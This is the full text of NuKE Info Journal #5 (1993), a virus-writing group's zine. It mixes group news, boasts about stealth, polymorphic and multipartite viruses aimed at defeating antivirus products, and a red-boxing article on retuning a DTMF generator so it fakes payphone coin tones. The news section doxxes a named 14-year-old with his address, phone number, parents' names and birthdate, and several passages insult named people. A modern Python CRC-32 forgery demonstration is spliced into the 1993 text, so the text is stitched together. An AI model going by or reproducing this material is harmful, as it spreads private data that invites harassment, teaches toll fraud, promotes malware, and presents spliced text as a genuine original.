NuKE Issue 05


===========================================================================
NuKE Info Journal #5
~~~~~~~~~~~~~~~~~~~~
March 13, 1993
~~~~~~~~~~~~~~

Article Topics.
~~~~~~~~~~~~~~
1. Halt! Who Goes There? (An Intro from Rock Steady)
2. State of 708 (An Intro from Nowhere Man)
3. NuKE Australia
4. NuKE TimeLine
5. DTMF Generator and Structural Design to Red & White Boxing
6. IBM 4700 Unix System, Why are these Bank Systems Popular?
7. An Intro to Red Boxing
8. McAfee's ViruScan complete Virus signature listing
9. Viral Group? or Viral WareZ?
10. V.C.L. v2.0 Update
11. Data Encryption Standard
12. Disinfection on Fly, for your virus
13. Infection on Closing for your virus
14. Multipartite Viruses
15. Daemaen Virus
16. Sunday Telegraph Interview with Barbara Lewis
17. NuKE PoX v2.0 Sources
18. 1024 SBC Sources
19. Cyberculture
20. Truth on Gary Watson
21. Files Included in this Info Journal
22. Credits and Site Listing
===========================================================================
===========================================================================
Who Goes There? - A Fast Intro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetings, my fellow cipher-associated phreaks, and welcome to the fifth
issue of our "Informational Journal" by NuKE associates, otherwise
expressed as our "InfoJournal" for short. It has been perhaps a long
while since our last InfoJournal; many thought we died out, as we had
calls from our local AV (AntiVirus) community to check it out. I blame
the long delay on re-structuring, on being new here and forgetting I had an
InfoJournal to produce, and lastly on them k0ol guys that want to
take our butts and lock us up and throw away the key. "We're back!!!"

The new InfoJournal has undergone new structural changes, the biggest
being the bi-structural format: you can either execute the small
5k Hypertext file to read this like in our previous releases, or you
can take out your favourite editor and read the (NK-INFO5.TXT) directly.
Nevertheless I do hope you will execute the small 5k Hypertext file as
it contains features that are not in the data file, and it does a
CRC-32 checksum check on the data file to make sure it has not been
tampered with. Anyhow this may be the LAST InfoJournal in Hypertext format.
We may present a text-only file soon enough, as we intend to make the
release dates a little more frequent; perhaps a monthly journal seems to
be in our interests right now.

New structural changes have been introduced into NuKE. I (Rock Steady)
am perhaps the administrator of NuKE, as I play an active role in this
dictating body, but nevertheless we also have other associates
co-administrating NuKE with myself: Nowhere Man, Phrozen Doberman and
Savage Beast are the other key-members, and we can not forget our latest
additions, Screaming Radish and TäLöN.

Our goal today is not a "perfect" group, nor do we wish to rule the
scene, far from the truth. In a world that is so corrupt, we try to bring
order and truth! The idea of creating "robots" to perhaps reach out
and set an example that we cannot be stopped is amazing! Yes, we have
created viruses beyond the scope of the narrow minded AV world -- in that
we are in control, and if what we must do is discredit your software then
by-darn-it we will.

I hope to set an example with this organization we call "NuKE" -- we
certainly DON'T think of NuKE as "just a" group. Normally a group is
localized, but in our case the most powerful members are scattered on
three different continents! Certainly we are not here to assimilate
anyone, we simply wish to co-join ideologies. We call ourselves
"anarchist." We suffer from injustice and repression brought upon us and
every non-illiterate computer user by the AV world. With that we looked
into our world, the sister world, the light of freedom in the dark night!
Yes, we may be "underground" but our alienation gives us the upper hand
over the AV world. We certainly know that our output perhaps will profit
AVers and crush the small guys, but until the day comes that people
understand that a piece of code is only code and not a biological hazard,
our work is not done. All we wish to do is simply to bring out the
truth, nothing more, no conquering of the world, no destruction of
computer networks, and certainly no one falling to our mercy for help. We
give you what the butt-tight corporates hide from you. All we say is open
your eyes, mature a little: Michelangelo will not cause every computer on
the 6th day of March to die, rather it was more of a publicity stunt so
that you will fill the AVers' pockets!

One amazing case is if "Rock Steady" trades a virus with a buddy, this
is OUTLAWED, and we are pointed out to be the "Evil Hackers," but, if
an AntiVirus person such as Frisk were to trade viruses with Joseph Greco,
this is labelled as "the research of viruses." We, too, research our
viruses, but we take an additional step forward -- we also research the
AntiVirus products and label all of their flaws! But since we do that, the
butt-tight corporate AntiVirus people label us as evil-doers. We are flesh
just like yourselves.

"Fame is really your WORST enemy." (Tormentor/DY)

Perhaps the smartest quote I've seen, taken from my bud Tormentor, of
Demoralized Youth.

Nevertheless, I present to you this InfoJournal #5; apparently NuKE
developed farther than ever expected! And we cannot mimic anyone as
there is NO ONE to mimic. From here on NuKE is treading upon "unknown"
territory, and you will see that in the articles presented here. The
advances are "mind-boggling!" History is in the making!

Rock Steady/NuKE
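A note on the CRC-32 check mentioned in the intro above. A CRC-32 over the
data file catches accidental corruption (a bad download, a flipped bit on
disk); it does not stop deliberate tampering. CRC is a linear function, so
anyone who can edit the data file can also append four chosen bytes that
drive the checksum back to whatever value the viewer expects, and the check
passes on the altered file. The Python below is an added example for this
edition, not code from the original journal or from the NuKE hypertext
reader; the sample file contents, the "PuKE" edit and the function names are
constructed for illustration.

```python
import zlib
import hashlib


def _crc32_table():
    # Standard reflected CRC-32 table (polynomial 0xEDB88320), the same table
    # zlib.crc32 uses, so the register arithmetic below matches zlib exactly.
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = _crc32_table()


def check_crc32(data: bytes, expected: int) -> bool:
    """The kind of check a viewer performs: does the data file's CRC-32
    match the value recorded alongside it?"""
    return (zlib.crc32(data) & 0xFFFFFFFF) == expected


def forge_crc32(data: bytes, target: int) -> bytes:
    """Return 4 bytes that, appended to `data`, make zlib.crc32() equal
    `target`. Each appended byte shifts 8 register bits out and XORs in one
    table entry, so four bytes are enough to steer all 32 bits."""
    # Register state after `data` (zlib applies a final XOR with all-ones).
    reg = (zlib.crc32(data) & 0xFFFFFFFF) ^ 0xFFFFFFFF
    # Walk the wanted final register backwards through four byte steps.
    # The high bytes of the 256 table entries are a permutation of 0..255,
    # so the table index used at each step is uniquely determined.
    want = target ^ 0xFFFFFFFF
    for _ in range(4):
        idx = next(n for n in range(256) if _TABLE[n] >> 24 == want >> 24)
        want = (((want ^ _TABLE[idx]) << 8) | idx) & 0xFFFFFFFF
    # `want` now equals reg XOR the four patch bytes in little-endian order.
    return (want ^ reg).to_bytes(4, "little")


def demo() -> dict:
    # Constructed stand-in for the journal's data file.
    original = b"NuKE Info Journal #5 -- data file (constructed sample)\r\n"
    recorded_crc = zlib.crc32(original) & 0xFFFFFFFF  # what the viewer stores

    # An attacker edits the text, then appends four bytes chosen so that the
    # CRC-32 of the tampered file equals the recorded value again.
    tampered = original.replace(b"NuKE", b"PuKE")
    tampered += forge_crc32(tampered, recorded_crc)

    return {
        "tampered_differs": tampered != original,
        "crc_check_passes_on_tampered": check_crc32(tampered, recorded_crc),
        "sha256_detects_change": hashlib.sha256(tampered).digest()
        != hashlib.sha256(original).digest(),
    }


if __name__ == "__main__":
    print(demo())
```

The trailing four bytes are harmless to a plain text viewer, which is exactly
why a checksum alone is not an integrity control. A cryptographic hash such as
SHA-256 (shown in the demo) detects the change, and only a signature or a hash
published out of band tells the reader that the data file is the one the
authors shipped.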
===========================================================================
===========================================================================
The State of 708
~~~~~~~~~~~~~~~~

Welcome to another exciting article detailing the triumphs and
tribulations of everyone's favourite LATA, the 708/312 (Chicago) area.
Since the last InfoJournal a few events have come up which deserve
special attention, specifically the loss of two of the area's best boards,
Ripco ][ and Nun-Beater's Anonymous, and changes at The Hell Pit. Read on
for more details...

Ripco -- R.I.P.?
~~~~~~~~~~~~~~~~
Perhaps the most famous board in this area is the legendary Ripco ][,
a text/message-oriented board run by Dr. Ripco. Ripco, in service since
December 1983, is the area's, perhaps even the nation's, most established
underground board, draws hundreds of users from all over North America
and had a huge collection of historic text files. However, Ripco is
probably best known for its role in the Operation Sundevil crackdown of
1990, during which U.S. Secret Service agents broke into Dr. Ripco's
apartment, detained him without cause, and seized all of his computer
equipment, including the Ripco BBS. Due to a complete lack of evidence, Dr.
Ripco was set free, and Ripco went back up later that year with donated
software and equipment. Now, in 1993, Ripco has suffered another blow.
On January 21st, Dr. Ripco decided to change his hard disk controller;
being a prudent man, he backed up all files first using FastBack Plus (this
was the fatal mistake). After reformatting his drives, the new controller
failed to work properly. When he did a restore, however, he was in for a
nasty surprise -- Fastback had failed him, and nearly all of his files were
unrecoverable. Luckily, the key system files and user logs were intact,
but most of the file bases were gone forever.
Dr. Ripco requests that if you have any of his old files, you
re-upload them to Ripco ][ (the number is +1-312-528-5020) or mail them
to him at his post office box (Bruce Esquibel, P.O. Box 18169, Chicago,
Illinois 60618, USA). Dr. Ripco says he'll be happy to reimburse you for
disks and postage. I encourage everyone to chip in and support Ripco in
another time of need.

Then, on March 7, there was another shocking announcement at Ripco. The
following are the highlights of the message that Dr. Ripco requested be
passed on to the general public:


"this is a bit difficult to do but it's got to be said.

technically the board isn't closing and going away forever but some major
changes are going to take place shortly and for all practical reasons, it
probably isn't going to exist as you now know it.

for about the last year, myself and several individuals on the system have
been toying with the idea of getting the system on internet. if you are not
familiar with internet, it's a world-wide network of computer systems which
basically makes a 100 line 6 gig private bbs look like a c-64 running off
one floppy.

the problem however is public access to it. most of you that have used
internet find out about that hard lesson sooner or later. chicago seems to
be one of the few places in the area where public access is a challenge.

i'd like to change that.

...to continue on with this project it has come to the point of dropping
dos completely and switching the system over to UNIX completely. this means
the program and the bbs as you see it will be dumped.

not to keep your hopes up, what will be used to replace it will look like
garbage initially. it'll be difficult to use and hard to figure out unless
you have some prior UNIX experience.

although i cannot be more specific on the new system at this time i do want
to say that ripco ][ will be put into a suspended state, in case everything
falls through and the project is abandoned, i promise to put things back to
the way it was.

so this isn't quite goodbye, just a vacation of sorts."
-- Dr. Ripco

So it seems for now that Ripco ][ is gone, at least for a while. As of the
release of this InfoJournal, Ripco is still up, although file access has
been removed. Let's hope for the best...


The Marty Zwikel Affair
~~~~~~~~~~~~~~~~~~~~~~~
In October 1992 a local loser named Repeat Offender (real name: Marty
Zwikel) decided that, given the fact that he had managed to actually talk to
Rock Steady, he was a bona fide NuKE member. Before anyone was able to
stop him, Marty decided to have a flame-war with Phalcon/SKISM over VX_NET.
Marty made false accusations toward Phalcon/SKISM (which I will not repeat
here), then accused GarbageHeap and Count Zero of lying to him, and falsely
claimed that Rock Steady and myself supported his statements. He even had
the audacity to add the NuKE signature after his name. Luckily cooler
tempers prevailed, and everyone came to realize that he was just a local
geek posing...he soon left the net, after complaints by all parties. For
those of you who may be under the mistaken belief that "Repeat Offender"
is in any way affiliated with NuKE (or ever was), THIS IS NOT TRUE. In
actuality, Mr. Zwikel is a fourteen-year-old local fuck who tried to make
the big leagues and made a fool of himself. Let's take a closer look at
this asshole, shall we?

Marty Zwikel is a 14-year-old male (we think) who is currently a freshman
at Buffalo Grove high school in Northwest suburban Chicago, where he has
earned the nickname "Adolf." Why, you might ask? A few classmates of his
chose this because "he's a stupid computer geek who has no friends and
everyone hates him and we think he'll grow up to be crazy and so we call
him Adolf," they say. A year or so ago he ran a board called "No Bitches
Allowed" under another handle; luckily this immature punk was taught a
lesson by an irritated user (who chooses to remain anonymous) and
No Bitches Allowed was successfully taken down.

But Marty wouldn't learn. He brought his board back up as "The Altar,"
a K-RaD 0 WaREZ board and assumed the handle "The All Powerful." Then
he caught the H/P/V craze (as has most of 708, ugh) and changed his handle
to "Repeat Offender," after a lame Richard Marx album. Then he publicly
announced on Nun-Beater's Anonymous that he was starting a "secret crashing
group" called Children of the Night, and immediately mailed me demanding
to co-op with NuKE. When asked what his one-man group has actually done
he said "I can't tell you which boards I've crashed because you might be
friends with the sysops and get angry at me." (In other words, nothing.)
Then came this incident over VX_NET. Now Marty has joined a local
anti-Semitic crashing group which has been harassing and crashing boards
all over the area. Will this kid ever learn?

Marty Zwikel lives at 3906 Mitchel Drive in Arlington Heights, Illinois
with his father, Dean, and his mother, Susan. Perhaps you'd like to speak
to him voice...you can reach him at +1-708-506-1980. As previously
mentioned, Marty was born on July 28, 1978 and has blighted the world ever
since. Perhaps some of you will find this information useful. I sure
have...hehehe.

Nun-Beaters Goes Down
~~~~~~~~~~~~~~~~~~~~~
In early November 1992 Guido Sanchez, BLaH president and all-around wacky
dude, took down Nun-Beaters Anonymous, his world-famous BBS, for
undisclosed personal reasons. N.B.A., as it is known, was best known for
its zany message bases, sysop access for first-time callers, and
complete and total lack of sysop control. In fact the sysop actually
encouraged people to leech entire file bases at one time, disabling all
file restrictions for all users and adding a special "/LEECH" command just
for that purpose. According to Guido, N.B.A. should be back sometime soon,
but, although it might have a software change, will maintain its
free-wheeling tradition. "It should be back up this summer," says Guido.
"Actually, I don't know when it'll be back up, so whenever you're bored
put it in the re-dial queue and you might get lucky. The number is
+1-708-251-5094. Kick the habit, call N.B.A. today!"

As an interesting side-note, Nun-Beaters Anonymous was mentioned in
Boardwatch Magazine (a print publication) for having an unusual name.
"We don't even want to know," Boardwatch wrote. The strange thing about
this is that N.B.A. had been down for four months when this was published.


Changes at Hell Pit
~~~~~~~~~~~~~~~~~~~
The Hell Pit, NuKE's only active Chicago site, and perhaps Chicago's only
remaining quality BBS, has been undergoing some changes recently which
deserve mention here. First of all, Kato, one of the system's two sysops,
has gone away to university, leaving Hades as the board's only acting
sysop. All messages concerning the system should be addressed to him,
*not* to Kato. Kato logs in very rarely, and only has time to read normal
private mail. Hell Pit has also purged the user list recently of the many
users who don't call regularly, don't do anything but leech, etc. This is
in response to the growing scarcity of disk space (though there is talk
of a disk upgrade) and the tremendous in-use time of the system. FidoNet
was dropped due to lack of interest, so now Hades is in the process of
(finally!) adding NuKENET.

Again, contrary to rumour, Hell Pit is *NOT* a fed board. This rumour
continues to resurface from time to time, but is just as untrue as ever.
The Hell Pit is still active, too; some people have speculated that it's
down, since the line is always busy. That's normal, folks -- Hell Pit
is in use perhaps 85% of the time. So set your modem to wardial and call
The Hell Pit at +1-708-459-7267 today!

Nowhere Man/NuKE
===========================================================================
===========================================================================
IJ #5 Comments by Phrozen Doberman, NuKE Australian Rep
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Intro
~~~~~
When most people think of Australia, they remember a famous Australian
movie, _Crocodile Dundee_. Some instantly assume that we shave with
six-inch knives and keep crocodiles as pets. Maybe the feds do, but not we
at NuKE. Yes, we have definitely joined the group of countries which are
endlessly advancing in computer systems technology.

Before now, no-one had intended to put Australia on the map of countries
where viruses are written. But time cannot be separated from change, and
changed we have. This year, three good .ASM coders from Australia joined
NuKE in an effort to reach a common goal. Distance, race, religion and
language put aside, they all put in their two-bits worth, so everyone could
benefit (Frisk/McAfee _NoT_).

But the year has just begun, and it looks like it will be one that we won't
forget. 1992 was the year of development, the year of brainstorming and
virus writing. 1993 is the time when we wrap our presents up, when the
emphasis changes from mass writing to organized virus implementation.

Gone are the days of the passive virus. The virus that runs, infects and
destroys. Frisk/TBAV have put an end to that. Now, it's _their_ turn. The
active virus is here to stay, and it shall stay as long as we can keep it.
As virus writers, we all know our direction needs to change. The user is no
longer the ultimate target, now we are to aim at destroying every last
piece of user confidence in Frisk/McAfee software.

NuKE's philosophy has changed over time, and like any philosophy, it should
be allowed to change. One must never under-estimate the power of experience
and thus we have come to the belief that:

By attacking computer users, we gain nothing and anti-
virus vendors gain all, but by attacking anti-virus
products, we not only inundate the anti-virus companies
with more work, but destroy the users confidence in their
programs.

This is the philosophy that will put the fear into every anti-virus vendor,
and now it is they who will have to face this reality. We realize what
Frisk/McAfee _want_ us to do, to continue doing what we have in the past,
but we know better than that. If there is one thing I would like to teach
McAfee/Frisk it would be to show them that they aren't dealing with any
bunch of smart kiddies, because now we will become as organized as them.

One could consider such a result of this philosophy. For every user who
loses confidence in Frisk/McAfee and returns to NAV/CPAV, we are giving our
future viruses a much better chance of survival. Frisk/McAfee deal the
cards, they _have_ the support of the IBM PD world. NAV/CPAV receive the
cards, thus they lack in keeping updated. This is what we need to exploit.

I'm not going to sit here and make statements that I don't believe in. Nor
could I be bothered using this introduction as some egotistical experience.
I am here to tell you, the follower, onlooker, or participant of NuKE,
that we are not just any underground group.

I admit, I can't write a virus for shit. In fact, my role in NuKE has
nothing to do with viruses. My best contribution to NuKE is in its
management. I can only tell you using the knowledge that I have learnt over
time, that no matter how good your programmers are, no matter how good
your tutorials are, no matter how good you can hack or crack
F-prot/McAfee, it will be wasted if it's not implemented properly.

I only want one thing from NuKE. I want to see the group reach its full
potential. If I can help make the basis of a NuKE a platform more suitable
for other experienced programmers to use, then that is what I aim to do.
This is the year where NuKE will be reforming many of its practices. You
are not just observing a group of highly skilled programmers, going about
their work, but a group with a highly organized structure.

Organization is the way NuKE will survive. It is how we can stop the
Frisk/McAfee team beating us. It can help us in every way, shape and form,
with beta-testing, virus distribution, info distribution, nukenet
management, and most importantly, a single combined push for the active
anti-Frisk/anti-McAfee virus code.

This is not the time or place to start talking about NuKE-Net organization
in depth. NuKE-CoNF will deal with that. What is NuKE-CoNF? In short, it is
going to be a detailed system analysis of NuKE, so we can optimize our
procedures, and not just make them into efficient ones, but the best.

Anyone can contribute to NuKE-Conf, so long as you are a NuKE member or
associate. VX/P-S associates may also contribute ideas. All submissions
will be worked over, compared with other submissions, and modified if
necessary.

Unfortunately, NuKE can not guarantee that results of NuKE-CoNF will be
published.

Before I continue, I make one pledge to all those reading this. If we, as
virus writers, want to achieve our goals, then we need to work together. We
need to understand our weaknesses and our strengths, and improve our
systems where possible, for any group which can do this does not just
exist as a magnetic particle on a hard disk somewhere on someone's computer
but continues to succeed with the spirit of every participating member, the
spirit of NuKE.

Thank You.

Phrozen Doberman
Melbourne, Australia
22nd February, 1993


New Info
~~~~~~~~
I am now beta-testing a Tic File Distribution link between myself and
Screaming Radish. It seems to be working fine, and if implemented, all
members will benefit. First, however, let me explain what "TiC" is all
about.

"TiC" or TDF (TIC File Distribution), as we will refer to it, is a way in
which NuKENET BBSes can transfer files between each other in a very simple
and automatic way. "TiC" will attach a hatched file (that is, a file you
intend *everyone* to have, ie: InfoJournals) to your Front Door,
D'Bridge or similar Fido-standard-compatible mail handler. A quick
example: Rock Steady wants to release a new virus, but he wants to make
sure everyone gets it. He places a .ZIPped copy of the virus's kernel in a
special area where his "TiC" processor (ie: FileMgr) will identify this
virus as a new file to be hatched.

His "TiC" processor then determines what systems are in the export list,
and attaches this file (as a netmail file attach) to each node in the
export list, along with a file with an extension ending in .TIC. Inside
this .TIC file are the file area's name, a description and seen-bys.

I suggest that the following areas are set up:

VIRUS_BETA   = Internal beta-testing viruses. Never to be released.
               Only for members. All bug reports via NuKENET.

VIRUS_FINAL  = Final kernels of viruses. _MUST_ have been beta-tested.
               Not for release to the general public.

VIRUS_INFECT = Infected programs with the virus so we may under
               "beta-testers."

VIRUS_SOURCE = All virus source.

VIRUS_EXTRA  = Odd things. Including IJ's.

All comments, via NuKENET please.

New Memberz
~~~~~~~~~~~
I'd like to announce the following new NuKE members:

Screaming Radish - NuKE Aust. Vice Rep
Shindaq Arl'hur - Member
The Wierd One - Member
TäLöN - Member

Left Memberz
~~~~~~~~~~~~
I'd like to announce the following memberz have left:

Lord Venom and Screaming Jesus

The Pit BBS is *NO LONGER* a NuKE support BBS.

Memberz Analysis
~~~~~~~~~~~~~~~~
Although there existed a stage where I was the only NuKE Australian member,
the festive season has brought many a virus writer out of the closet. The
three new members, S.R., Shindaq and TäLöN, all have previous experience
with writing viruses.

Screaming Radish: is extremely skilled in stealth and memory
~~~~~~~~~~~~~~~~ addressing techniques; saying such a statement is like
saying that E=MC² was an okay formula. SR is MC², SR has abilities never
dreamed about. You have a problem, SR will get you a solution! We hated that
memory loss in TSR viruses, so SR got us a routine to steal buffers from
DOS, and used those to allocate the virus! As DOS buffers are about 512
bytes each, stealing 3-4 will result in no harm to the system and NO MEMORY
CHANGE AT ALL! Amazing! And we laughed at Proto-T? And the list goes on...

Shindaq: Has been disabling viruses for a few years, and specializes
~~~~~~~ in dropper-type viruses. He has also written a dropper-type virus
from scratch.

TäLöN: Has been a virus writer for years, here's his background, in his
~~~~~ own words:

"Hi there, I am typing to you from the Newcastle, New South Wales,
Australia. I am not new to the virus scene, in fact I was a member of the
puppet group [PuKE].

Just a quick background on PuKE: it was set up about a year ago by Harry
McBungus (who wrote X-Fungus, No Frills 2.0 and No Frills 3.0, all
unremarkable) simply as a stuff-around, paying out on NuKE. Harry saw NuKE
getting large egos over large, non-resident direct-action viruses: in other
words he thought they were idiots. Hence, PuKE endeavoured to write things
which compared to NuKE WareZ but on a far smaller code scale. The fruits of
Harry's labours were 'stolen' by myself, however, and that is how they grew
in the wild; otherwise they would not be around.
Although PuKE disliked NuKE, everything grows in stages, people mature, and
since then NuKE has evolved into the best Power Virus Group in the world.

(As a side note, Harry left the scene in around June 1992, as a result of
something called a Fraud squad. Good luck to Harry in whatever he is now
doing.)

I, TäLöN, defected to NuKE shortly after writing the Dudly virus (also
known as No Frills 4.0 and V2P6Z Mark 2, which was stolen off me by
someone hacking into my board. I had no intention of releasing it into the
wild. It's unremarkable besides its lame polymorphism, which is similar to
V2P6 in end result, not generation)

I have not added anything to the virus scene since the writing of Dudley-1,
but grew active a month ago with the creation of another, yet-to-be-named
virus, namely a 3k COM/EXE/SYS/BIN/OVL/MBR/BS infecting, polymorphic
stealth virus. It hides partition infection; it hides file size increase on
directory; it infects boot sectors of ANY floppy format, current or future,
on read/write access; it infects hard disk partition on infected disk boot
or infected file execution on virgin system, and so on. One mother of a
virus.

However, I have taken great care not to make it destructive in anyway, so
no stupid AV researcher can point the finger and spin the typical anti-virus
rhetoric, 'Bad virus, bad virus, didn't you know every virus will destroy
precious hours of work.'

My opinions on AV researchers in general is very low. I take great pride in
totally debunking their theories and stereotypes. I am NOT a social
recluse. I do not have a sunken chest, nor am I fat or a cowardly
insignificance. I possess a fair degree of common sense. I do not go out of
my way to trash boards or computers; in fact I steer away from such things.
Furthermore, I do not view virus writing or the discussion of viruses a
taboo subject.

Most of all I do not try to keep the public in the dark about what viruses
can and cannot do. Harry McBungus shared basically the same views but when
he tried to speak out and 'educate' the public, he instead got nailed by
the press. (The media is another of my pet hates.)

Anyway I have lost patience with hierarchy and bureaucracy... and the
media, the government and the public can basically suck John McAfee's dick
while he laughs all the way to the bank. We have provided an income for
John for long enough, it's time to make SCAN look like the total crock of
shit that it has always been.

Before I leave, just a few quick hi's, ho's and 'thanks' to:
John McAfee: Fuck You
Patricia 'It is unknown what this virus does besides replicate' Hoffman:
How about you get a clue before you make out you're the big-wig
virus analyzer. VSUM is the biggest farce since ViruScan itself.
Sara Gordon: for all the laughs your ridiculous psychological theories
about virus writers gave me. Try a bit harder.
Matt: for all the cool times we had. The legend of the 50-cent piss-up
will never leave my memory banks.
Pantera, Metallica: for providing an awesome soundtrack for virus
development!
and to NuKE for making everything possible.

TäLöN/NuKE"

All in all, you will be seeing a lot more from NuKE Australia this year. We
have refocused on the job, have a brand-new line up (new blood rarely does
harm) and we have a direct vision for the future. All of this would be hard
to achieve without the coherence, unity and strength of NuKE!

Final Note
~~~~~~~~~~
Here is where you all get your compliments! A big thanks to Rock Steady,
for keeping the NET alive. Overall, he has managed NuKENET in the best way
possible, and this does deserve some positive feedback. I would also like
to thank him for all the charges he has incurred while keeping the NuKENET
link alive! Yes, NuKENET pays for its calls. No illegal crap in our camp!

Secondly, I would like to thank Nowhere Man for supplying us with
beta versions of NED, Screaming Radish for helping me when I needed
suggestions and technical advice, Shindaq for keeping the BBS alive, TäLöN
for helping out and keeping your cool, and last but not least, Savage
Beast for keeping an excellent database of viruses.

Hubbada, Hubbada, and good virus writing to you all....

Please address all correspondence to: Phrozen Doberman,111:950/3@Nuke_NET

Phrozen Doberman/NuKE
===========================================================================
===========================================================================
A NuKE Timeline
~~~~~~~~~~~~~~~
--------------------------------------------------------------------------
October 1992
NED (NuKE Encryption Device) is completed, an encryption engine that is
very simple to use, yet overcomes all of the "flaws" of MtE to become
perhaps the wildest engine out, with an ability to understand code and
compile its very own code. Amazing. VCL v2.0 will "field test" the success
of this NuKE product by Nowhere Man.
--------------------------------------------------------------------------
November 1992
NuKE-PoX Virus version 2.0 noted as a common North-American virus in VSUM.
--------------------------------------------------------------------------
November 1992
NuKENET joins with VX_NET from ARiSToLE's board.
--------------------------------------------------------------------------
November 1992
NuKENET is extended not only to Australia, but, with the help of Savage
Beast, is also expanded to Europe. Demoralized Youth of Sweden gets on
NuKENet, along with other supporting countries like the Netherlands,
Switzerland, and Bulgaria.
--------------------------------------------------------------------------
November 1992
NuKE encounters "Death Angel" of Toronto, the virus programmer of the
original ONTARIO-512 and ONTARIO-1024 (aka 1024-SBC). Death Angel made
himself a NuKE supporter. In our InfoJournal #3 we disassembled the
Ontario-512 virus, and as a result the Ontario-730 was derived from it
(which was NOT programmed by Death Angel!). Both viruses got listed as
common viruses in North America! Death Angel also gave us his original
source of Ontario-512 and -1024 (which we include in this issue).
--------------------------------------------------------------------------
December 1992
Screaming Radish joins up with the NuKE Team. His abilities with the 80x86
are mind-boggling and he is known for the best all-nighters that I've ever
seen... Even though relations with Screaming Radish go "WAY-BACK" (he was
considered part of us for a while), only NOW did Screaming Radish
officially join NuKE by completing his "test-of-NuKEhood" in the
Australian outback, and as a proven hacker he succeeded in hiding his
tracks and killing the Bushmen and crocodiles on his tail...<hehe> [What
can I say, it's tough to become an Aussie-NuKEer! :-)]
--------------------------------------------------------------------------
January 10th, 1993
TäLöN: enough respect goes out to this charm... He too has succeeded in the
wild-bush hunt of the Aussie, though he was never the same afterward...
<hehe> Just as Compton was put on the map by the Brothers, TäLöN is the
one to put Aussie onto the map. For that I gave him a whole paragraph
in this intro...
--------------------------------------------------------------------------
January 10th, 1993
Paul Ferguson thinks he's an amazing god with connections (for the local
strawberry club) since he knows how to use Directory Assistance and called
NuKE up! Big-ol' Pauly cried on our shoulders that [and we quote]
"ITS A POLYMORPHIC WAR OUT THERE! (sob, cough, snort)"
Huh? Paul got a copy of TPE. (Yeah right! He heard of it and wanted to know
if we had it!). All in all Paul showed himself to be a powerful man, with
very powerful friends, and was able to prove that he was THE god being
able to crush us with a snap of his fingers. For this NuKE awarded Paul
with the NuKE Wanker of the Year award. It's the FIRST time NuKE presented
such an award, so we named it after Paul, therefore with respect we now
call it...
"The NuKE Big-Ol' Paul Ferguson Wanker Award"
We were going to send him a picture of a horse's ass and sign it, but we
figured a mirror will be pretty much be the same, but cheaper...
--------------------------------------------------------------------------
January 24th, 1993
Daemaen Virus created by TäLöN. This virus will infect ANYTHING that
moves. It will infect .EXEs, COMs, OV?s, SYSs, BINs, floppy boot sectors,
and HD partition tables. It also contains a dir-stealth routine, and will
infect files on open, creation, close, browsing, attribute functions, you
name it... A very fast, extremely fast infector. Its features will be
embedded inside VCL v2.0, coming soon in a computer near you...
--------------------------------------------------------------------------
February 1993
The Weird One and Shindaq Arl'hur have joined the NuKE team. Their
abilities are also well spoken of, being amazing guys and an asset to the
Team. (Though it'd be cooler if they talked a little more...<Hehe>) Hiya'
Guys!
--------------------------------------------------------------------------
February 1993
The Dark Elf Virus, by Shindaq Arl'hur, comes alive. It is another
multipartite virus that infects boot sectors and HD Partition as well as
.EXE and .COM files. With stealth boot abilities it too will have its
features embedded inside VCL v2.0.
--------------------------------------------------------------------------
February 2nd, 1993
Rock Steady goes to the local post office and mails two letters to two NuKE
members who will remain unknown (Phrozen Doberman and TäLöN), and yet where
did the letters end up? [Thanks for telling me you got 'em! NOT!]
--------------------------------------------------------------------------
February 8th, 1993
ARCV of England gets busted BIG-TIME. Apache Warrior and his followers are
charged with computer fraud for the purpose of causing damage with
self-replicating code (viruses). England flips, and the nation of n0-Crimez
wonders how to control this loop in the hole. An "example" is supposed to
be made of the group to scare others from repeating their actions!
--------------------------------------------------------------------------
February 15th, 1993
Barbara Lewis from the English newspaper _Sunday Telegraph_ calls up
NuKE for a one-on-one interview. The bitch got nothing, as we've already
visited Compton. But she pulled a strawberry act on us -- yup, she gave us
her number, and now NuKE and Barbara got a hot "soap-opera" relation going!
Our favourite "girlfriend-boyfriend" saying is "Bitch, get off my wanker!"
--------------------------------------------------------------------------
March 1st, 1993
Rock Steady had a vision of releasing the NuKE InfoJournal today, but
federal officers thought otherwise... [BiTE Me]
--------------------------------------------------------------------------
March 12th, 1993
After visiting Compton, Rock Steady had the sudden urge to rap out the
words to the song "Fuck Tha Police" by NWA while entering the station with
a logo "Blow away the pigs" embedded on his t-shirt, visiting his parole
officer...
--------------------------------------------------------------------------
===========================================================================
===========================================================================
DTMF Generators, White Boxing, and Red Boxing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I've seen way too many fabrications of red boxes before me; the H/P
community enjoys talking about them a lot and fantasizing about their
abilities. But seldom do I see an accurate example of any box construction.
Perhaps I'm simply in the wrong circle? Nevertheless I did a little
research on the actual structure of a DTMF generator and on how to convert
it into a red and white box. 2600 Enterprises did have the BEST red box
example to pass before me; however, in Canada legislation differs quite a
lot, and any kit or package that can be hacked is not tolerated, so the
famous Radio-Shack Pocket Dialer is not available here, and I would say the
same of many other places, such as Europe or Australia, where Radio Shack is
not as widely established as in the USA. Our Radio Shacks are no bigger
than a local corner candy store, and the only useful products they sell are
calculators. Pathetic is the scene I run into everywhere I go in lovely
Canada. So since the Radio-Shack Pocket Dialer WITH MEMORY is not
available, I guess we must build the actual device from scratch. It's
fairly simple, and I've already succeeded in building the DTMF generator.
It's very easy -- it consists of one IC, a crystal to control the
oscillator (in the IC) and a key-pad.

The construction of the DTMF tone generator is perhaps the hardest part of
this project, and yet it is fairly simple. Anyhow, this project does
require you to know the basics of kit building, and hopefully you know how
to use a soldering iron, as you will need to solder the IC and crystal onto
a simple board. Now the DTMF tones are generated internally inside the IC,
but the timing depends on an external crystal oscillator, and the only
external component we have is the 3.579545 MHz crystal. Right here we have
a "white box," as a white box is supposed to generate the DTMF "Touch-Tone"
tones. Now if we replaced the 3.579545 MHz crystal with a 6.5536 MHz one,
our "*" key on the key-pad will actually be DARN close to 3900 Hertz, the
EXACT frequency that a coin produces when being entered inside the pay-
phone. So in reality, instead of putting in $0.25 you can put these tones
on the mouth piece and fool the Bell System.


